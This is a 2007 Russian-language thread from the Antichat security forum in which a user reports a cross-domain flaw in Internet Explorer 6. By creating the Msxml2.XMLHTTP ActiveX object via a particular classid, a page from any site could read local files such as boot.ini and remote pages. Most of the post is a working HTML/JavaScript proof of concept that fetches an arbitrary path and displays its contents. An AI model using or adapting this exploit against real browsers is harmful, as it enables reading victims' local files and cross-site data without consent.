ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Cross Domain Scripting в Осле
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Cross Domain Scripting в Осле
  #1  
Старый 30.06.2007, 11:41
Аватар для V1k
V1k
Познающий
Регистрация: 01.02.2007
Сообщений: 41
Провел на форуме:
1718137

Репутация: 201
По умолчанию Cross Domain Scripting в Осле
Недавно, изучая стандартные ActiveX компоненты на предмет уязвимостей, наткнулся на одну занятную вещь: если ActiveX компонент Msxml2.XMLHTTP объявить, как показано ниже, на него не действуют ограничения безопасности. Поэтому можно просмотреть произвольный локальный (например file:///c:/boot.ini) или удаленный (http://forum.antichat.ru) файл с любого домена. Тестировал на IE 6 XP SP2 - работает, на IE 7 Vista - нет. Может есть у кого полностью запатченный Осел, проверить, исправил ли Мелкософт этот баг?
Код HTML:
<script>
function readfile(filename)
{
	try
	{
		var xmlobj = document.createElement ('object');
		xmlobj.setAttribute ('id','xmlobj');
		xmlobj.setAttribute ('classid','clsid:88D969EA-F192-11D4-A65F-0040963251E5');
		xmlobj.open ('get',filename, false);
		xmlobj.send ();
		var text = xmlobj.responseText;
		xmlobj = null;
		return text;
	}
	catch(e)
	{
		return 'Ошибка! '+e.description;
	}
}
</script>
<textarea id='text1' cols=60 rows=15></textarea></br>
<input size=58 id='file1'/>
<input type=button value='Открыть' onclick='text1.value=readfile(file1.value)'/>
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
Как использовать cross-site scripting (css) foreva Чужие Статьи 0 06.02.2005 19:03



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ